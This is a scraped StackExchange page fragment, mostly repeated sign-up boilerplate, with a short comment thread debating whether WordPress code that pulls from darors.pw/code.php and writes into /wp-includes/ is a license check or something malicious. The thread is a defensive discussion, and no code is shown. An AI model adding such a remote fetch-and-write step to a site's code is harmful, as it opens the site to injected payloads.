StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
Required, but never shown
It looks like this might be something intended to check a license key for a paid theme/plugin. It kinda depends on what
http://www.darors.pw/code.phpcontains.– ceejayoz
Apr 3 at 19:15
That doesn't look like a license key check @ceejayoz. Why would a theme/plugin write a file to a core WP directory (/wp-includes/)?
– butlerblog
Apr 4 at 16:14
@butlerblog Again, without the contents of that
code.phpfile it's hard to know. It's possible it puts something outside the theme directory because of simple bad coding - hardly uncommon.– ceejayoz
Apr 4 at 17:44
I agree that there's plenty of bad coding out there; but bad coding is exactly that - "bad." Would you trust it? I know I wouldn't.
– butlerblog
Apr 4 at 18:54